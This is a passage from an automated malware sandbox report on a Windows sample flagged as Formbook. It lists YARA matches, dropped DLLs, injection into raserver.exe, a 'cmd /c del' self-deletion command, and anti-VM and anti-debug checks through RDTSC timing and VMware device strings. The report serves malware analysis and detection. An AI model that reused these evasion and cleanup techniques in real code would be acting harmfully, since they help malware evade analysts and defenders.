          Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@14/8
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_703C4243 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile created: C:\Users\user\AppData\Local\Temp\nsx545.tmpJump to behavior
          Source: lpdKSOB78u.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: lpdKSOB78u.exeVirustotal: Detection: 44%
          Source: lpdKSOB78u.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile read: C:\Users\user\Desktop\lpdKSOB78u.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: lpdKSOB78u.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lpdKSOB78u.exe, 00000000.00000003.205218390.0000000002BF0000.00000004.00000001.sdmp, lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lpdKSOB78u.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_70481A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: h1luljvls0ea.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_70482F60 push eax; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00416147 push esi; iretd
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00416125 push ds; retf
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004153DC push es; retf
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00415B8C push ebp; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00414E12 push ebx; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00414FCB pushfd ; iretd
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009ED0D1 push ecx; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00416147 push esi; iretd
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00416125 push ds; retf
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004153DC push es; retf
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00415B8C push ebp; ret
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_0041B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B06125 push ds; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B06147 push esi; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B05B8C push ebp; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0B3FB push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B053DC push es; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0B45C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B04E12 push ebx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B04FCB pushfd ; iretd
          Source: initial sampleStatic PE information: section name: .data entropy: 7.74690382322
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile created: C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile created: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dllJump to dropped file
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000AF85E4 second address: 0000000000AF85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000AF896E second address: 0000000000AF8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 4832Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6468Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_004065C1 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.233719341.0000000008907000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.231945952.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000002.483847310.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.232804005.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.225509168.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: lpdKSOB78u.exe, 00000000.00000002.211513573.0000000000808000.00000004.00000020.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\>
          Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmpBinary or memory string: qeMusic
          Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_70481A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_703C47AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_703C45AA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009BC182 mov eax, dword ptr fs:[00000030h]
